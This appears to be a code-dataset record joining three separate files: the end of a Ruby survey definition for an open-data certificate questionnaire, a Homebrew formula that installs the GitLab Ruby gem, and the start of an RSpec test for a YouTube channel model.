:requirement => ['exemplar_14']
a_generic 'keeps data structured like JSON, XML or CSV',
:text_as_statement => 'in a generic data format',
:help_text => 'Any format that stores normal structured data can express geographic data too, particularly if it only holds data about points.',
:requirement => ['pilot_17']
a_unsuitable 'aren\'t designed for geographic data like Word or PDF',
:text_as_statement => 'in a format unsuitable for geographic data',
:help_text => 'These formats don\'t suit geographic data because they obscure the underlying structure of the data.'
label_exemplar_14 'You should <strong>publish geographic data in a format designed that purpose</strong> so that people can use widely available tools to process it.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_14'
dependency :rule => 'A and (B)'
condition_A :q_dataType, '==', :a_geographic
condition_B :q_geographicFormat, '!=', :a_specific
label_pilot_17 'You should <strong>publish geographic data as structured data</strong> so that it\'s easy to process.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_17'
dependency :rule => 'A and (B and C)'
condition_A :q_dataType, '==', :a_geographic
condition_B :q_geographicFormat, '!=', :a_specific
condition_C :q_geographicFormat, '!=', :a_generic
q_structuredFormat 'Does your structured data include formats that',
:discussion_topic => :structuredFormat,
:display_on_certificate => true,
:text_as_statement => 'Structured data is published',
:pick => :one
dependency :rule => 'A'
condition_A :q_dataType, '==', :a_structured
a_suitable 'are designed for structured data like JSON, XML, Turtle or CSV',
:text_as_statement => 'in a structured data format',
:help_text => 'These formats organise data into a basic structure of things which have values for a known set of properties. These formats are easy for computers to process automatically.',
:requirement => ['pilot_18']
a_unsuitable 'aren\'t designed for structured data like Word or PDF',
:text_as_statement => 'in a format unsuitable for structured data',
:help_text => 'These formats don\'t suit this kind of data because they obscure its underlying structure.'
label_pilot_18 'You should <strong>publish structured data in a format designed that purpose</strong> so that it\'s easy to process.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_18'
dependency :rule => 'A and (B)'
condition_A :q_dataType, '==', :a_structured
condition_B :q_structuredFormat, '!=', :a_suitable
q_identifiers 'Does your data use persistent identifiers?',
:discussion_topic => :identifiers,
:display_on_certificate => true,
:text_as_statement => 'The data includes',
:help_text => 'Data is usually about real things like schools or roads or uses a coding scheme. If data from different sources use the same persistent and unique identifier to refer to the same things, people can combine sources easily to create more useful data. Identifiers might be GUIDs, DOIs or URLs.',
:pick => :one
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'persistent identifiers',
:requirement => ['standard_33']
label_standard_33 'You should <strong>use identifiers for things in your data</strong> so that they can be easily related with other data about those things.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_33'
dependency :rule => 'A'
condition_A :q_identifiers, '==', :a_false
q_resolvingIds 'Can the identifiers in your data be used to find extra information?',
:discussion_topic => :resolvingIds,
:display_on_certificate => true,
:text_as_statement => 'The persistent identifiers',
:pick => :one
dependency :rule => 'A'
condition_A :q_identifiers, '==', :a_true
a_false 'no, the identifiers can\'t be used to find extra information',
:text_as_statement => ''
a_service 'yes, there is a service that people can use to resolve the identifiers',
:text_as_statement => 'resolve using a service',
:help_text => 'Online services can be used to give people information about identifiers such as GUIDs or DOIs which can\'t be directly accessed in the way that URLs are.',
:requirement => ['standard_34']
a_resolvable 'yes, the identifiers are URLs that resolve to give information',
:text_as_statement => 'resolve because they are URLs',
:help_text => 'URLs are useful for both people and computers. People can put a URL into their browser and read more information, like <a href="http://opencorporates.com/companies/gb/08030289">companies</a> and <a href="http://data.ordnancesurvey.co.uk/doc/postcodeunit/EC2A4JE">postcodes</a>. Computers can also process this extra information using scripts to access the underlying data.',
:requirement => ['exemplar_15']
label_standard_34 'You should <strong>provide a service to resolve the identifiers you use</strong> so that people can find extra information about them.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_34'
dependency :rule => 'A and (B and C)'
condition_A :q_identifiers, '==', :a_true
condition_B :q_resolvingIds, '!=', :a_service
condition_C :q_resolvingIds, '!=', :a_resolvable
label_exemplar_15 'You should <strong>link to a web page of information about each of the things in your data</strong> so that people can easily find and share that information.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_15'
dependency :rule => 'A and (B)'
condition_A :q_identifiers, '==', :a_true
condition_B :q_resolvingIds, '!=', :a_resolvable
q_resolutionServiceURL 'Where is the service that is used to resolve the identifiers?',
:discussion_topic => :resolutionServiceURL,
:display_on_certificate => true,
:text_as_statement => 'The identifier resolution service is at',
:help_text => 'The resolution service should take an identifier as a query parameter and give back some information about the thing it identifies.'
dependency :rule => 'A and B'
condition_A :q_identifiers, '==', :a_true
condition_B :q_resolvingIds, '==', :a_service
a_1 'Identifier Resolution Service URL',
:string,
:input_type => :url,
:placeholder => 'Identifier Resolution Service URL',
:requirement => ['standard_35']
label_standard_35 'You should <strong>have a URL through which identifiers can be resolved</strong> so that more information about them can be found by a computer.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_35'
dependency :rule => 'A and B and C'
condition_A :q_identifiers, '==', :a_true
condition_B :q_resolvingIds, '==', :a_service
condition_C :q_resolutionServiceURL, '==', {:string_value => '', :answer_reference => '1'}
q_existingExternalUrls 'Is there third-party information about things in your data on the web?',
:discussion_topic => :existingExternalUrls,
:help_text => 'Sometimes other people outside your control provide URLs to the things your data is about. For example, your data might have postcodes in it that link to the Ordnance Survey website.',
:pick => :one,
:required => :exemplar
dependency :rule => 'A'
condition_A :q_identifiers, '==', :a_true
a_false 'no'
a_true 'yes'
q_reliableExternalUrls 'Is that third-party information reliable?',
:discussion_topic => :reliableExternalUrls,
:help_text => 'If a third-party provides public URLs about things in your data, they probably take steps to ensure data quality and reliability. This is a measure of how much you trust their processes to do that. Look for their open data certificate or similar hallmarks to help make your decision.',
:pick => :one,
:required => :exemplar
dependency :rule => 'A and B'
condition_A :q_identifiers, '==', :a_true
condition_B :q_existingExternalUrls, '==', :a_true
a_false 'no'
a_true 'yes'
q_externalUrls 'Does your data use those third-party URLs?',
:discussion_topic => :externalUrls,
:display_on_certificate => true,
:text_as_statement => 'Third-party URLs are',
:help_text => 'You should use third-party URLs that resolve to information about the things your data describes. This reduces duplication and helps people combine data from different sources to make it more useful.',
:pick => :one
dependency :rule => 'A and B and C'
condition_A :q_identifiers, '==', :a_true
condition_B :q_existingExternalUrls, '==', :a_true
condition_C :q_reliableExternalUrls, '==', :a_true
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'referenced in this data',
:requirement => ['exemplar_16']
label_exemplar_16 'You should <strong>use URLs to third-party information in your data</strong> so that it\'s easy to combine with other data that uses those URLs.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_16'
dependency :rule => 'A and B and C and D'
condition_A :q_identifiers, '==', :a_true
condition_B :q_existingExternalUrls, '==', :a_true
condition_C :q_reliableExternalUrls, '==', :a_true
condition_D :q_externalUrls, '==', :a_false
label_group_13 'Trust',
:help_text => 'how much trust people can put in your data',
:customer_renderer => '/partials/fieldset'
q_provenance 'Do you provide machine-readable provenance for your data?',
:discussion_topic => :provenance,
:display_on_certificate => true,
:text_as_statement => 'The provenance of this data is',
:help_text => 'This about the origins of how your data was created and processed before it was published. It builds trust in the data you publish because people can trace back how it has been handled.',
:help_text_more_url => 'http://www.w3.org/TR/prov-primer/',
:pick => :one
a_false 'no',
:text_as_statement => ''
a_true 'yes',
:text_as_statement => 'machine-readable',
:requirement => ['exemplar_17']
label_exemplar_17 'You should <strong>provide a machine-readable provenance trail</strong> about your data so that people can trace how it was processed.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_17'
dependency :rule => 'A'
condition_A :q_provenance, '==', :a_false
q_digitalCertificate 'Where do you describe how people can verify that data they receive comes from you?',
:discussion_topic => :digitalCertificate,
:display_on_certificate => true,
:text_as_statement => 'This data can be verified using',
:help_text => 'If you deliver important data to people they should be able to check that what they receive is the same as what you published. For example, you can digitally sign the data you publish, so people can tell if it has been tampered with.'
a_1 'Verification Process URL',
:string,
:input_type => :url,
:placeholder => 'Verification Process URL',
:requirement => ['exemplar_18']
label_exemplar_18 'You should <strong>describe how people can check that the data they receive is the same as what you published</strong> so that they can trust it.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_18'
dependency :rule => 'A'
condition_A :q_digitalCertificate, '==', {:string_value => '', :answer_reference => '1'}
end
section_social 'Social Information',
:description => 'Documentation, support and services' do
label_group_15 'Documentation',
:help_text => 'how you help people understand the context and content of your data',
:customer_renderer => '/partials/fieldset'
q_documentationMetadata 'Does your data documentation include machine-readable data for:',
:discussion_topic => :documentationMetadata,
:display_on_certificate => true,
:text_as_statement => 'The documentation includes machine-readable data for',
:pick => :any
dependency :rule => 'A'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
a_title 'title',
:text_as_statement => 'title',
:requirement => ['standard_36']
a_description 'description',
:text_as_statement => 'description',
:requirement => ['standard_37']
a_issued 'release date',
:text_as_statement => 'release date',
:requirement => ['standard_38']
a_modified 'modification date',
:text_as_statement => 'modification date',
:requirement => ['standard_39']
a_accrualPeriodicity 'frequency of releases',
:text_as_statement => 'release frequency',
:requirement => ['standard_40']
a_identifier 'identifier',
:text_as_statement => 'identifier',
:requirement => ['standard_41']
a_landingPage 'landing page',
:text_as_statement => 'landing page',
:requirement => ['standard_42']
a_language 'language',
:text_as_statement => 'language',
:requirement => ['standard_43']
a_publisher 'publisher',
:text_as_statement => 'publisher',
:requirement => ['standard_44']
a_spatial 'spatial/geographical coverage',
:text_as_statement => 'spatial/geographical coverage',
:requirement => ['standard_45']
a_temporal 'temporal coverage',
:text_as_statement => 'temporal coverage',
:requirement => ['standard_46']
a_theme 'theme(s)',
:text_as_statement => 'theme(s)',
:requirement => ['standard_47']
a_keyword 'keyword(s) or tag(s)',
:text_as_statement => 'keyword(s) or tag(s)',
:requirement => ['standard_48']
a_distribution 'distribution(s)',
:text_as_statement => 'distribution(s)'
label_standard_36 'You should <strong>include a machine-readable data title in your documentation</strong> so that people know how to refer to it.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_36'
dependency :rule => 'A and B'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '!=', :a_title
label_standard_37 'You should <strong>include a machine-readable data description in your documentation</strong> so that people know what it contains.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_37'
dependency :rule => 'A and B'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '!=', :a_description
label_standard_38 'You should <strong>include a machine-readable data release date in your documentation</strong> so that people know how timely it is.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_38'
dependency :rule => 'A and B'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '!=', :a_issued
label_standard_39 'You should <strong>include a machine-readable last modification date in your documentation</strong> so that people know they have the latest data.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_39'
dependency :rule => 'A and B'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '!=', :a_modified
label_standard_40 'You should <strong>provide machine-readable metadata about how frequently you release new versions of your data</strong> so people know how often you update it.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_40'
dependency :rule => 'A and B'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '!=', :a_accrualPeriodicity
label_standard_41 'You should <strong>include a canonical URL for the data in your machine-readable documentation</strong> so that people know how to access it consistently.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_41'
dependency :rule => 'A and B'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '!=', :a_identifier
label_standard_42 'You should <strong>include a canonical URL to the machine-readable documentation itself</strong> so that people know how to access to it consistently.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_42'
dependency :rule => 'A and B'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '!=', :a_landingPage
label_standard_43 'You should <strong>include the data language in your machine-readable documentation</strong> so that people who search for it will know whether they can understand it.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_43'
dependency :rule => 'A and B'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '!=', :a_language
label_standard_44 'You should <strong>indicate the data publisher in your machine-readable documentation</strong> so people can decide how much to trust your data.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_44'
dependency :rule => 'A and B'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '!=', :a_publisher
label_standard_45 'You should <strong>include the geographic coverage in your machine-readable documentation</strong> so that people understand where your data applies to.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_45'
dependency :rule => 'A and B'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '!=', :a_spatial
label_standard_46 'You should <strong>include the time period in your machine-readable documentation</strong> so that people understand when your data applies to.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_46'
dependency :rule => 'A and B'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '!=', :a_temporal
label_standard_47 'You should <strong>include the subject in your machine-readable documentation</strong> so that people know roughly what your data is about.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_47'
dependency :rule => 'A and B'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '!=', :a_theme
label_standard_48 'You should <strong>include machine-readable keywords or tags in your documentation</strong> to help people search within the data effectively.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_48'
dependency :rule => 'A and B'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '!=', :a_keyword
q_distributionMetadata 'Does your documentation include machine-readable metadata for each distribution on:',
:discussion_topic => :distributionMetadata,
:display_on_certificate => true,
:text_as_statement => 'The documentation about each distribution includes machine-readable data for',
:pick => :any
dependency :rule => 'A and B'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '==', :a_distribution
a_title 'title',
:text_as_statement => 'title',
:requirement => ['standard_49']
a_description 'description',
:text_as_statement => 'description',
:requirement => ['standard_50']
a_issued 'release date',
:text_as_statement => 'release date',
:requirement => ['standard_51']
a_modified 'modification date',
:text_as_statement => 'modification date',
:requirement => ['standard_52']
a_rights 'rights statement',
:text_as_statement => 'rights statement',
:requirement => ['standard_53']
a_accessURL 'URL to access the data',
:text_as_statement => 'a URL to access the data',
:help_text => 'This metadata should be used when your data isn\'t available as a download, like an API for example.'
a_downloadURL 'URL to download the dataset',
:text_as_statement => 'a URL to download the dataset'
a_byteSize 'size in bytes',
:text_as_statement => 'size in bytes'
a_mediaType 'type of download media',
:text_as_statement => 'type of download media'
label_standard_49 'You should <strong>include machine-readable titles within your documentation</strong> so people know how to refer to each data distribution.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_49'
dependency :rule => 'A and B and C'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '==', :a_distribution
condition_C :q_distributionMetadata, '!=', :a_title
label_standard_50 'You should <strong>include machine-readable descriptions within your documentation</strong> so people know what each data distribution contains.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_50'
dependency :rule => 'A and B and C'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '==', :a_distribution
condition_C :q_distributionMetadata, '!=', :a_description
label_standard_51 'You should <strong>include machine-readable release dates within your documentation</strong> so people know how current each distribution is.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_51'
dependency :rule => 'A and B and C'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '==', :a_distribution
condition_C :q_distributionMetadata, '!=', :a_issued
label_standard_52 'You should <strong>include machine-readable last modification dates within your documentation</strong> so people know whether their copy of a data distribution is up-to-date.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_52'
dependency :rule => 'A and B and C'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '==', :a_distribution
condition_C :q_distributionMetadata, '!=', :a_modified
label_standard_53 'You should <strong>include a machine-readable link to the applicable rights statement</strong> so people can find out what they can do with a data distribution.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_53'
dependency :rule => 'A and B and C'
condition_A :q_documentationUrl, '!=', {:string_value => '', :answer_reference => '1'}
condition_B :q_documentationMetadata, '==', :a_distribution
condition_C :q_distributionMetadata, '!=', :a_rights
q_technicalDocumentation 'Where is the technical documentation for the data?',
:discussion_topic => :technicalDocumentation,
:display_on_certificate => true,
:text_as_statement => 'The technical documentation for the data is at'
a_1 'Technical Documentation URL',
:string,
:input_type => :url,
:placeholder => 'Technical Documentation URL',
:requirement => ['pilot_19']
label_pilot_19 'You should <strong>provide technical documentation for the data</strong> so that people understand how to use it.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_19'
dependency :rule => 'A'
condition_A :q_technicalDocumentation, '==', {:string_value => '', :answer_reference => '1'}
q_vocabulary 'Do the data formats use vocabularies or schemas?',
:discussion_topic => :vocabulary,
:help_text => 'Formats like CSV, JSON, XML or Turtle use custom vocabularies or schemas which say what columns or properties the data contains.',
:pick => :one,
:required => :standard
a_false 'no'
a_true 'yes'
q_schemaDocumentationUrl 'Where is documentation about your data vocabularies?',
:discussion_topic => :schemaDocumentationUrl,
:display_on_certificate => true,
:text_as_statement => 'The vocabularies used by this data are documented at'
dependency :rule => 'A'
condition_A :q_vocabulary, '==', :a_true
a_1 'Schema Documentation URL',
:string,
:input_type => :url,
:placeholder => 'Schema Documentation URL',
:requirement => ['standard_54']
label_standard_54 'You should <strong>document any vocabulary you use within your data</strong> so that people know how to interpret it.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_54'
dependency :rule => 'A and B'
condition_A :q_vocabulary, '==', :a_true
condition_B :q_schemaDocumentationUrl, '==', {:string_value => '', :answer_reference => '1'}
q_codelists 'Are there any codes used in this data?',
:discussion_topic => :codelists,
:help_text => 'If your data uses codes to refer to things like geographical areas, spending categories or diseases for example, these need to be explained to people.',
:pick => :one,
:required => :standard
a_false 'no'
a_true 'yes'
q_codelistDocumentationUrl 'Where are any codes in your data documented?',
:discussion_topic => :codelistDocumentationUrl,
:display_on_certificate => true,
:text_as_statement => 'The codes in this data are documented at'
dependency :rule => 'A'
condition_A :q_codelists, '==', :a_true
a_1 'Codelist Documentation URL',
:string,
:input_type => :url,
:placeholder => 'Codelist Documentation URL',
:requirement => ['standard_55']
label_standard_55 'You should <strong>document the codes used within your data</strong> so that people know how to interpret them.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_55'
dependency :rule => 'A and B'
condition_A :q_codelists, '==', :a_true
condition_B :q_codelistDocumentationUrl, '==', {:string_value => '', :answer_reference => '1'}
label_group_16 'Support',
:help_text => 'how you communicate with people who use your data',
:customer_renderer => '/partials/fieldset'
q_contactUrl 'Where can people find out how to contact someone with questions about this data?',
:discussion_topic => :contactUrl,
:display_on_certificate => true,
:text_as_statement => 'Find out how to contact someone about this data at',
:help_text => 'Give a URL for a page that describes how people can contact someone if they have questions about the data.'
a_1 'Contact Documentation',
:string,
:input_type => :url,
:placeholder => 'Contact Documentation',
:requirement => ['pilot_20']
label_pilot_20 'You should <strong>provide contact information for people to send questions</strong> about your data to.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_20'
dependency :rule => 'A'
condition_A :q_contactUrl, '==', {:string_value => '', :answer_reference => '1'}
q_improvementsContact 'Where can people find out how to improve the way your data is published?',
:discussion_topic => :improvementsContact,
:display_on_certificate => true,
:text_as_statement => 'Find out how to suggest improvements to publication at'
a_1 'Improvement Suggestions URL',
:string,
:input_type => :url,
:placeholder => 'Improvement Suggestions URL',
:requirement => ['pilot_21']
label_pilot_21 'You should <strong>provide instructions about how suggest improvements</strong> to the way you publish data so you can discover what people need.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_21'
dependency :rule => 'A'
condition_A :q_improvementsContact, '==', {:string_value => '', :answer_reference => '1'}
q_dataProtectionUrl 'Where can people find out how to contact someone with questions about privacy?',
:discussion_topic => :dataProtectionUrl,
:display_on_certificate => true,
:text_as_statement => 'Find out where to send questions about privacy at'
a_1 'Confidentiality Contact Documentation',
:string,
:input_type => :url,
:placeholder => 'Confidentiality Contact Documentation',
:requirement => ['pilot_22']
label_pilot_22 'You should <strong>provide contact information for people to send questions about privacy</strong> and disclosure of personal details to.',
:custom_renderer => '/partials/requirement_pilot',
:requirement => 'pilot_22'
dependency :rule => 'A'
condition_A :q_dataProtectionUrl, '==', {:string_value => '', :answer_reference => '1'}
q_socialMedia 'Do you use social media to connect with people who use your data?',
:discussion_topic => :socialMedia,
:pick => :one
a_false 'no'
a_true 'yes',
:requirement => ['standard_56']
label_standard_56 'You should <strong>use social media to reach people who use your data</strong> and discover how your data is being used',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_56'
dependency :rule => 'A'
condition_A :q_socialMedia, '==', :a_false
repeater 'Account' do
dependency :rule => 'A'
condition_A :q_socialMedia, '==', :a_true
q_account 'Which social media accounts can people reach you on?',
:discussion_topic => :account,
:display_on_certificate => true,
:text_as_statement => 'Contact the curator through these social media accounts',
:help_text => 'Give URLs to your social media accounts, like your Twitter or Facebook profile page.',
:required => :required
dependency :rule => 'A'
condition_A :q_socialMedia, '==', :a_true
a_1 'Social Media URL',
:string,
:input_type => :url,
:required => :required,
:placeholder => 'Social Media URL'
end
q_forum 'Where should people discuss this dataset?',
:discussion_topic => :forum,
:display_on_certificate => true,
:text_as_statement => 'Discuss this data at',
:help_text => 'Give a URL to your forum or mailing list where people can talk about your data.'
a_1 'Forum or Mailing List URL',
:string,
:input_type => :url,
:placeholder => 'Forum or Mailing List URL',
:requirement => ['standard_57']
label_standard_57 'You should <strong>tell people where they can discuss your data</strong> and support one another.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_57'
dependency :rule => 'A'
condition_A :q_forum, '==', {:string_value => '', :answer_reference => '1'}
q_correctionReporting 'Where can people find out how to request corrections to your data?',
:discussion_topic => :correctionReporting,
:display_on_certificate => true,
:text_as_statement => 'Find out how to request data corrections at',
:help_text => 'Give a URL where people can report errors they spot in your data.'
dependency :rule => 'A'
condition_A :q_corrected, '==', :a_true
a_1 'Correction Instructions URL',
:string,
:input_type => :url,
:placeholder => 'Correction Instructions URL',
:requirement => ['standard_58']
label_standard_58 'You should <strong>provide instructions about how people can report errors</strong> in your data.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_58'
dependency :rule => 'A and B'
condition_A :q_corrected, '==', :a_true
condition_B :q_correctionReporting, '==', {:string_value => '', :answer_reference => '1'}
q_correctionDiscovery 'Where can people find out how to get notifications of corrections to your data?',
:discussion_topic => :correctionDiscovery,
:display_on_certificate => true,
:text_as_statement => 'Find out how to get notifications about data corrections at',
:help_text => 'Give a URL where you describe how notifications about corrections are shared with people.'
dependency :rule => 'A'
condition_A :q_corrected, '==', :a_true
a_1 'Correction Notification URL',
:string,
:input_type => :url,
:placeholder => 'Correction Notification URL',
:requirement => ['standard_59']
label_standard_59 'You should <strong>provide a mailing list or feed with updates</strong> that people can use to keep their copies of your data up-to-date.',
:custom_renderer => '/partials/requirement_standard',
:requirement => 'standard_59'
dependency :rule => 'A and B'
condition_A :q_corrected, '==', :a_true
condition_B :q_correctionDiscovery, '==', {:string_value => '', :answer_reference => '1'}
q_engagementTeam 'Do you have anyone who actively builds a community around this data?',
:discussion_topic => :engagementTeam,
:help_text => 'A community engagement team will engage through social media, blogging, and arrange hackdays or competitions to encourage people to use the data.',
:help_text_more_url => 'http://theodi.org/guide/engaging-reusers',
:pick => :one
a_false 'no'
a_true 'yes',
:requirement => ['exemplar_19']
label_exemplar_19 'You should <strong>build a community of people around your data</strong> to encourage wider use of your data.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_19'
dependency :rule => 'A'
condition_A :q_engagementTeam, '==', :a_false
q_engagementTeamUrl 'Where is their home page?',
:discussion_topic => :engagementTeamUrl,
:display_on_certificate => true,
:text_as_statement => 'Community engagement is done by',
:required => :required
dependency :rule => 'A'
condition_A :q_engagementTeam, '==', :a_true
a_1 'Community Engagement Team Home Page URL',
:string,
:input_type => :url,
:placeholder => 'Community Engagement Team Home Page URL',
:required => :required
label_group_17 'Services',
:help_text => 'how you give people access to tools they need to work with your data',
:customer_renderer => '/partials/fieldset'
q_libraries 'Where do you list tools to work with your data?',
:discussion_topic => :libraries,
:display_on_certificate => true,
:text_as_statement => 'Tools to help use this data are listed at',
:help_text => 'Give a URL that lists the tools you know or recommend people can use when they work with your data.'
a_1 'Tool URL',
:string,
:input_type => :url,
:placeholder => 'Tool URL',
:requirement => ['exemplar_20']
label_exemplar_20 'You should <strong>provide a list of software libraries and other readily-available tools</strong> so that people can quickly get to work with your data.',
:custom_renderer => '/partials/requirement_exemplar',
:requirement => 'exemplar_20'
dependency :rule => 'A'
condition_A :q_libraries, '==', {:string_value => '', :answer_reference => '1'}
end
end
| 54.45384 | 727 | 0.690886 |
28dd5148950d07000c4516c18d1a338b1154d6d7 | 2,815 | class GitlabGem < Formula
desc "Ruby client and CLI for GitLab API"
homepage "https://github.com/NARKOZ/gitlab"
url "https://github.com/NARKOZ/gitlab/archive/v4.18.0.tar.gz"
sha256 "6967bbf68ebff61714d855da950cfac4c8c3825a80d79f9210b40e37f6ba752c"
license "BSD-2-Clause"
bottle do
sha256 cellar: :any_skip_relocation, arm64_monterey: "551bcab9593a120bef2cd52443e90047dfba10de9d087dad66a0fa723f178021"
sha256 cellar: :any_skip_relocation, arm64_big_sur: "def9a9ac03f51469e8d51be097377444079b8c7d0b1c1c49f4ded06c8b2d6bd4"
sha256 cellar: :any_skip_relocation, monterey: "551bcab9593a120bef2cd52443e90047dfba10de9d087dad66a0fa723f178021"
sha256 cellar: :any_skip_relocation, big_sur: "def9a9ac03f51469e8d51be097377444079b8c7d0b1c1c49f4ded06c8b2d6bd4"
sha256 cellar: :any_skip_relocation, catalina: "def9a9ac03f51469e8d51be097377444079b8c7d0b1c1c49f4ded06c8b2d6bd4"
sha256 cellar: :any_skip_relocation, x86_64_linux: "629debe754bd144df8ea7078fd310a5622517442a6910e01ee0745a24685f3b6"
end
uses_from_macos "ruby", since: :catalina
resource "httparty" do
url "https://rubygems.org/gems/httparty-0.18.1.gem"
sha256 "878fe8038e344b219dbba9e20c442914a2be251d2f4a20bcdeb31f25dcb2f79d"
end
resource "mime-types" do
url "https://rubygems.org/gems/mime-types-3.3.1.gem"
sha256 "708f737e28ceef48b9a1bc041aa9eec46fa36eb36acb95e6b64a9889131541fe"
end
resource "mime-types-data" do
url "https://rubygems.org/gems/mime-types-data-3.2020.0512.gem"
sha256 "a31c1705fec7fc775749742c52964a0e012968b43939e141a74f43ffecd6e5fc"
end
resource "multi_xml" do
url "https://rubygems.org/gems/multi_xml-0.6.0.gem"
sha256 "d24393cf958adb226db884b976b007914a89c53ad88718e25679d7008823ad52"
end
resource "terminal-table" do
url "https://rubygems.org/gems/terminal-table-1.8.0.gem"
sha256 "13371f069af18e9baa4e44d404a4ada9301899ce0530c237ac1a96c19f652294"
end
resource "unicode-display_width" do
url "https://rubygems.org/gems/unicode-display_width-1.7.0.gem"
sha256 "cad681071867a4cf52613412e379e39e85ac72b1d236677a2001187d448b231a"
end
def install
ENV["GEM_HOME"] = libexec
resources.each do |r|
r.fetch
system "gem", "install", r.cached_download, "--ignore-dependencies",
"--no-document", "--install-dir", libexec
end
system "gem", "build", "gitlab.gemspec"
system "gem", "install", "--ignore-dependencies", "gitlab-#{version}.gem"
(bin/"gitlab").write_env_script libexec/"bin/gitlab", GEM_HOME: ENV["GEM_HOME"]
end
test do
ENV["GITLAB_API_ENDPOINT"] = "https://example.com/"
ENV["GITLAB_API_PRIVATE_TOKEN"] = "token"
output = shell_output("#{bin}/gitlab user 2>&1", 1)
assert_match "Server responded with code 404", output
end
end
| 41.397059 | 123 | 0.7627 |
0124f38e190c9171c8db3af7abbb88b8039ba241 | 9,883 | # encoding: UTF-8
require 'spec_helper'
require 'yt/models/channel'
describe Yt::Channel, :device_app do
subject(:channel) { Yt::Channel.new id: id, auth: $account }
context 'given someone else’s channel' do
let(:id) { 'UCxO1tY8h1AhOz0T4ENwmpow' }
it 'returns valid metadata' do
expect(channel.title).to be_a String
expect(channel.description).to be_a String
expect(channel.thumbnail_url).to be_a String
expect(channel.published_at).to be_a Time
expect(channel.privacy_status).to be_a String
expect(channel.view_count).to be_an Integer
expect(channel.video_count).to be_an Integer
expect(channel.subscriber_count).to be_an Integer
expect(channel.subscriber_count_visible?).to be_in [true, false]
end
describe '.videos' do
let(:video) { channel.videos.first }
specify 'returns the videos in the channel without tags or category ID' do
expect(video).to be_a Yt::Video
expect(video.snippet).not_to be_complete
end
describe '.where(id: *anything*)' do
let(:video) { channel.videos.where(id: 'invalid').first }
specify 'is ignored (all the channel’s videos are returned)' do
expect(video).to be_a Yt::Video
end
end
describe '.where(chart: *anything*)' do
let(:video) { channel.videos.where(chart: 'invalid').first }
specify 'is ignored (all the channel’s videos are returned)' do
expect(video).to be_a Yt::Video
end
end
describe '.includes(:statistics, :status)' do
let(:video) { channel.videos.includes(:statistics, :status).first }
